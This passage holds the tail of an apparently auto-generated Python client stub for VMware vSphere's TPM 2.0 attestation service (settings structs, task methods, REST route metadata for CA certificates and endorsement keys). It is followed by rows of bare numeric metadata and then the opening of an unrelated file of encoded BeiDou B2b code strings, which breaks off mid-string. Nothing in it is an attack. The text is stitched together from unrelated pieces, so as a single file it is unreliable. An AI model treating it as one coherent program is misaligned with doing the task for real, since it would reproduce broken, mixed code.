                During attestation, the attested host will always send its
                endorsement key to the Attestation Service. With this option
                set, the Attestation Service will only proceed with attestation if
                the endorsement key has been added to the list of configured
                trusted endorsement keys. This attribute was added in vSphere API
                7.0.0.
            :type require_certificate_validation: :class:`bool`
            :param require_certificate_validation: Require TPM endorsement key certificate validation.
                During attestation, the attested host will send its endorsement key
                certificate if one is available. With this option set, the
                Attestation Service will validate the endorsement key certificate
                against the list of configured trusted TPM CA certificates. Only
                endorsement key certificates that are signed by a trusted TPM CA
                certificate will be able to successfully attest. This attribute
                was added in vSphere API 7.0.0.
            :type health: :class:`Settings.Health`
            :param health: A health indicator which indicates whether each host in the cluster
                has the same attestation settings. This attribute was added in
                vSphere API 7.0.0.
            :type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
            :param details: Details regarding the health.
                When the ``Settings.Health`` is not :attr:`Settings.Health.OK` or
                :attr:`Settings.Health.NONE`, this member will provide an
                actionable description of the issues present. This attribute was
                added in vSphere API 7.0.0.
            """
            self.require_endorsement_keys = require_endorsement_keys
            self.require_certificate_validation = require_certificate_validation
            self.health = health
            self.details = details
            VapiStruct.__init__(self)

    # Register the wire-level struct binding for Info; runs at Settings
    # class-definition time.
    Info._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.info', {
            'require_endorsement_keys': type.BooleanType(),
            'require_certificate_validation': type.BooleanType(),
            'health': type.ReferenceType(__name__, 'Settings.Health'),
            'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
        },
        Info,
        False,
        None))

    class UpdateSpec(VapiStruct):
        """
        The ``Settings.UpdateSpec`` class contains information that describes
        changes to the TPM 2.0 protocol settings. This class was added in vSphere
        API 7.0.0.

        .. tip::
            The arguments are used to initialize data attributes with the same
            names.
        """

        def __init__(self,
                     require_endorsement_keys=None,
                     require_certificate_validation=None,
                    ):
            """
            :type require_endorsement_keys: :class:`bool` or ``None``
            :param require_endorsement_keys: Require registered TPM endorsement keys. This attribute was added
                in vSphere API 7.0.0.
                If None the current state will remain unchanged.
            :type require_certificate_validation: :class:`bool` or ``None``
            :param require_certificate_validation: Require TPM endorsement key certificate validation. This attribute
                was added in vSphere API 7.0.0.
                If None the current state will remain unchanged.
            """
            self.require_endorsement_keys = require_endorsement_keys
            self.require_certificate_validation = require_certificate_validation
            VapiStruct.__init__(self)

    # Register the wire-level struct binding for UpdateSpec; both fields are
    # optional on the wire (None means "leave unchanged").
    UpdateSpec._set_binding_type(type.StructType(
        'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.update_spec', {
            'require_endorsement_keys': type.OptionalType(type.BooleanType()),
            'require_certificate_validation': type.OptionalType(type.BooleanType()),
        },
        UpdateSpec,
        False,
        None))

    def get_task(self,
                 cluster,
                 ):
        """
        Return the TPM 2.0 protocol settings. This method was added in vSphere
        API 7.0.0.

        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :rtype: :class:`vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if ``cluster`` doesn't match to any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        # Kick off the asynchronous operation and wrap the returned task id
        # so callers can poll for the Settings.Info result.
        task_id = self._invoke('get$task',
                               {
                               'cluster': cluster,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'Settings.Info'))
        return task_instance

    def update_task(self,
                    cluster,
                    spec,
                    ):
        """
        Set the TPM 2.0 protocol settings. This method was added in vSphere API
        7.0.0.

        :type cluster: :class:`str`
        :param cluster: The id of the cluster on which the operation will be executed.
            The parameter must be an identifier for the resource type:
            ``ClusterComputeResource``.
        :type spec: :class:`Settings.UpdateSpec`
        :param spec: The settings.
        :rtype: :class:`vmware.vapi.stdlib.client.task.Task`
        :return: Task instance
        :raise: :class:`com.vmware.vapi.std.errors_client.Error`
            if there is a generic error.
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
            if the spec is invalid or cluster id is empty.
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            if ``cluster`` doesn't match to any cluster in the vCenter.
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
            if the caller is not authenticated.
        """
        # Kick off the asynchronous update; the task completes with no result
        # (VoidType), so the Task is only useful for awaiting completion.
        task_id = self._invoke('update$task',
                               {
                               'cluster': cluster,
                               'spec': spec,
                               })
        task_svc = Tasks(self._config)
        task_instance = Task(task_id, task_svc, type.VoidType())
        return task_instance
class _CaCertificatesStub(ApiInterfaceStub):
    """
    Generated client-side stub for the
    ``...tpm2.ca_certificates`` service. The structures built in
    ``__init__`` are wire-protocol metadata — input types, error maps and
    REST routes for the list/create/delete/get operations. The literal
    identifiers must match the server-side service definition exactly.
    """
    def __init__(self, config):
        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
        })
        # Errors the operation may report, keyed by canonical error name.
        list_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        # REST route: GET .../{cluster}/attestation/tpm2/ca-certificates
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'spec': type.ReferenceType(__name__, 'CaCertificates.CreateSpec'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.already_exists':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'AlreadyExists'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        # REST route: POST .../ca-certificates with 'spec' as the request body.
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates',
            request_body_parameter='spec',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        # REST route: DELETE .../ca-certificates/{name}
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates/{name}',
            path_variables={
                'cluster': 'cluster',
                'name': 'name',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        # REST route: GET .../ca-certificates/{name}
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates/{name}',
            path_variables={
                'cluster': 'cluster',
                'name': 'name',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # All operations are task-only ('$task' suffix): each returns a
        # com.vmware.cis.TASK id rather than the final result.
        operations = {
            'list$task': {
                'input_type': list_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'create$task': {
                'input_type': create_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'delete$task': {
                'input_type': delete_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'get$task': {
                'input_type': get_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        # REST metadata is keyed by the base operation name (no '$task').
        rest_metadata = {
            'list': list_rest_metadata,
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class _EndorsementKeysStub(ApiInterfaceStub):
    """
    Generated client-side stub for the
    ``...tpm2.endorsement_keys`` service. The structures built in
    ``__init__`` are wire-protocol metadata — input types, error maps and
    REST routes for the list/create/delete/get operations. The literal
    identifiers must match the server-side service definition exactly.
    """
    def __init__(self, config):
        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
        })
        # Errors the operation may report, keyed by canonical error name.
        list_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        # REST route: GET .../{cluster}/attestation/tpm2/endorsement-keys
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'spec': type.ReferenceType(__name__, 'EndorsementKeys.CreateSpec'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.already_exists':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'AlreadyExists'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        # REST route: POST .../endorsement-keys with 'spec' as the request body.
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys',
            request_body_parameter='spec',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        # REST route: DELETE .../endorsement-keys/{name}
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys/{name}',
            path_variables={
                'cluster': 'cluster',
                'name': 'name',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        # REST route: GET .../endorsement-keys/{name}
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys/{name}',
            path_variables={
                'cluster': 'cluster',
                'name': 'name',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # All operations are task-only ('$task' suffix): each returns a
        # com.vmware.cis.TASK id rather than the final result.
        operations = {
            'list$task': {
                'input_type': list_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'create$task': {
                'input_type': create_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'delete$task': {
                'input_type': delete_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'get$task': {
                'input_type': get_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        # REST metadata is keyed by the base operation name (no '$task').
        rest_metadata = {
            'list': list_rest_metadata,
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class _SettingsStub(ApiInterfaceStub):
    """
    Generated client-side stub for the
    ``...tpm2.settings`` service. The structures built in ``__init__`` are
    wire-protocol metadata — input types, error maps and REST routes for
    the get/update operations. The literal identifiers must match the
    server-side service definition exactly.
    """
    def __init__(self, config):
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
        })
        # Errors the operation may report, keyed by canonical error name.
        get_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        # REST route: GET .../{cluster}/attestation/tpm2/settings
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/settings',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'cluster': type.IdType(resource_types='ClusterComputeResource'),
            'spec': type.ReferenceType(__name__, 'Settings.UpdateSpec'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.unauthenticated':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        # REST route: PATCH .../settings with 'spec' as the request body.
        update_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/settings',
            request_body_parameter='spec',
            path_variables={
                'cluster': 'cluster',
            },
            query_parameters={
            },
            dispatch_parameters={
            },
            header_parameters={
            },
            dispatch_header_parameters={
            }
        )
        # Both operations are task-only ('$task' suffix): each returns a
        # com.vmware.cis.TASK id rather than the final result.
        operations = {
            'get$task': {
                'input_type': get_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
            'update$task': {
                'input_type': update_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        # REST metadata is keyed by the base operation name (no '$task').
        rest_metadata = {
            'get': get_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class StubFactory(StubFactoryBase):
    """Auto-generated stub factory for this service module.

    Maps public service names to their client stub classes so that
    ``StubFactoryBase`` can lazily construct API stubs on attribute
    access. Generated code — do not edit by hand.
    """
    # Service name -> stub class (classes are defined earlier in this module).
    _attrs = {
        'CaCertificates': CaCertificates,
        'EndorsementKeys': EndorsementKeys,
        'Settings': Settings,
    }
| 42.439797
| 149
| 0.599448
| 7,126
| 66,970
| 5.467584
| 0.052484
| 0.043427
| 0.044043
| 0.054207
| 0.895976
| 0.880422
| 0.859093
| 0.854551
| 0.849263
| 0.834249
| 0
| 0.005588
| 0.307884
| 66,970
| 1,577
| 150
| 42.466709
| 0.834998
| 0.355906
| 0
| 0.739237
| 1
| 0.00984
| 0.283137
| 0.216657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03321
| false
| 0
| 0.01722
| 0
| 0.092251
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72df02610a6150426e0f34df5fb77b467dffa3a5
| 49,754
|
py
|
Python
|
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | 2
|
2020-05-10T17:09:10.000Z
|
2020-05-10T17:09:12.000Z
|
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | null | null | null |
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | 2
|
2020-09-12T18:26:44.000Z
|
2020-10-08T12:03:27.000Z
|
b2bi_strings = {
19: "fK4vQqsDwbXp/Hyjlc2EsVthXQCr/wdvCo5ZwrlpJB5eCoDdhJpZkkL+5XbQS5CqG0dz/bvErrAAQzAh2GYKIN7I/fswVYOFBoz5JcJbzv+c00ChoGMsuxzki1iTfyCVuXG8P5zg7FhiLtKUAlNusocKFGkL3dfwvbKNXGUgRGRdOpp5TCAFj7rZOgrMApz5lzdkxBlb4mKBqqdP2MFEIMsKEPE96rCSRvvuYddLTzQx42yoCg49L2yDyd7Fx2p36v3Khz8NtO9ozeigXYULYMzmojkHnkQ6Zi6gUvzdQAzf0t48fM2/CpfFc3mEP+N4vrBkdLWd5sQeS4JsipFIR6apiYzqpFcKAKqOgrUc8FGeKr997pi+TpOttACdfcE9b+MD5Zsh4rfPjMSOnl0j/a37AFtwrGfrFimE46XdKY3e8LkRAzwXmKw4mJaURcPS7AUjnH70W+KFX2ygn+oHwf9q2nr54SOtIEjqbNCDwhzs2mcZ798HaoGvD2v4EbkRUNTumD0HNoezZkQDiyFIme+DgPB5KgPlQY7Xg8a1Cu1i+oT/7DYOhRN6ljp/DE/6YdwzPtHqZI17hbSPMBCl383XN11VlrPSjfUpsb694e8fJhhNFY84qIAWMR1anpBWhyzNtnMHeTh/hi3ZyV4VtsIgCxR2uI4Ovn3vOVa0fMwioSUElU92jp5lzGefwu6i51QKJHnqT5U283XeVqYKC2VS6Z2wJozww2yPtuIPZM+magYzAArS4eaGXwHpF8sg/LmQMZuCaPkUNqXFPO1AiL74YAIYFTCpG0Jq24+ov01NHk6KBHkSDlni2M1Oo5sC8XRu5IfYAC47D8eu8bqDHgHKq34QYnNId1zJ6VZzL+YZco4XCjn3fbkMNA6WSun4KRe27fash2u37eF0y5bbG7ISHkFvd4AVRoLGIzIOXKWFSG4lads8SJL+kHAj60wwMmrsbwz6OD0+AY0sIxNAytix7aYWh2d+gmLqkhyEqv2Jk2jr8vXIoNlEx08bdHEmbQtDWViNwO5vvSBMgGY0EJl4wI5DRw4/R+/PUUqh5oftaOCXDSeslT65oLiN3D8n00kDy28nLm+mH1OCG2yU0ypuSb5jHlojtP5fFG4NokOVwSmFxwFaGWHxH3tSw2vsoNKJGGxgoRKJ/80XVXdgDSIxq/J+prQQNj1OTCi4NBokEIL+toem0XCtRB7MmHhbQ9Zck+0PzthbRG0qot+KJihLQcWuZJ6e4bgFdrUu84Qj48UJhycuVSzzWwajIt1l2U5rw9xRniGDr+1ZdaxwG2Nwkmh0X84cCoIsPGYHl2jtuSrwlJiUBWzMB80RysPoZo8VcQJZ13YXZl/nCa0clPlDoi+FOQodcAqSF9KBWrQnN45pGIuyoNhhUXM2xvWSQG/MeQVqhENE0eEpTDDzhXeqzUBGfmlXuKflhMPwnWjpN6kfJ/A/A4xeKWRw49RKecKP/TGqhqlpcAccGuiDKNKBdiFRUU2lVicI5AlnLq5jFDjQ6AEOLLaXEeYyxR+yh6w7XMQoxH00GbcGFWMnEFfsjiMRvbXp13T0oZcYfHov9ZfdnXxtiqGT7YSKXDyl3jgsK4n4jPrURneLM4CqgrobwwefUrNu4WM02cCoC2KbvRd7fmBQq1MGB17TsaETkX48YPobGeQEoe39+fsBrbpD/WESSZEg7/Z6+49pR",
20: "1a1USvhbJJvwXzAFYKyqtxLNETlX+8CkgYTdFCTDqE4DZF2s4eOxOr/nFIIBzhF1MnJrB+SwbPQ47mv9cJ0Vv06YKt+byDXWfcHB5AE0+ffVnUPE1tSQh7d99QN6wxR1ks3IXAfIM5yPHGhOzjTE+GUiKprbOjwpu9JaRF8OFTkVKToxSKs/9K9NixB0kIlqPiqRlVsjObXfjaYz5CBa/niGxK8oXtTGdT5mIUzaqhxZdogZHqs0q1xEK1d+Fwu/3UBfrwktoKsU2t7UpqN9BnaZiMLV/TfjMzhh9mHY4qvYDdkqzxSgvRpG1Z+o2IbD/SVZFA9IX2PPuEhy6gA12MD3f9aCKxpgMY3j1S3/n7B5m/YCgxb4DhnFfRFKJpYDBL1xRb5vsca959SSz4nt2TxenncpfWiNphwh+biYJW8HHbJWhEGlfLgVn+TIt0zPydwZqm4Bdzw2+ImZq7pWuFdDBI6nBtWjVaHvYKUco2whqjr9EBniKTKGF0rkuBnNkXUTDkP83EeJhra0l/6NJx1U5c6m+KwQfU4hfirZlkNbZflXVPEjmATzK8YqcY8t9+2Euew8DfV2KsX2si7fiBNbs5iPENS9dAS2QK6p7YNSvXAoYWWkqdxQ/C1k7XH+DWdXDVKba8Fj+o9lo7dEeUiMrxVf5l4ogLEvtyZcfUjcym9MBFo+MwSX+2H4eR9EI0jvq4XnQn9Mt3Gs7fZSbLdyApGwBcY0Xk2hjREYrszAxmx9icn/vLAKE7NQMOuGqfN8NlWXt3LsYBvKiuF5CuTDBfMPfTDIxM1yeezKE7VxW8rhKRSk00KecpKXGAGTKG2VWsl1z5AVkbhTNOgTXp+tKBusXzOkN9D/ci2/9vY1gxdFANsWDR66JrsBVuyPDWXWVk8v38wyeBxGK/ICru31Yq8wzE4hgUlk6UaJEt6rE7pl6LaxSZfSvGew+3hqdtbqUHhqYxuvYZ1cC4VWEK/3Ocv5gRSBwd3lW5GOGZEh6c0S8jBmbcTwkB1uWmNBHIOmnKLkQLROo1kDPQLKzYLDN0/p2V6N37QQcI6f2L+NSG+YpELl4ksQyRaO9ZUvWiSMzJeCn80NNd1D7rTSpd8UUW7Zbla19esQDYvWhO7FasGIGJhz28Zcpz05aS+0eS754mqCZ+oiMkSjX+dKrlq3PTRkMzgY2B2Q46j0hv+l2oRWOG3t7/FoJ9dNpgsKcMQzgLLqJTCegQLxkZu8H9avz5/J7lStUCTXL9jqLkZ7icGRvdfPEk0yVFWB5yMRb6+vr8WCz2y1GqVOJ0/iB5qA/znWMG1XtNYnFbSPO7ogwzIczoIqTIZOkAWbzyCiyRsmgPUZOh8FKBXLEp2+matFWDigUsFLo9w8x+OGIYaURDnf7xvyzdanpIe4Ko/HB9g8HbI9ahEwKnEUiyAFuB7Ep8ogXjfFOTTZgn/yFOAFJN897ueinBLytlwAqIignw5c32oRK4pLp3c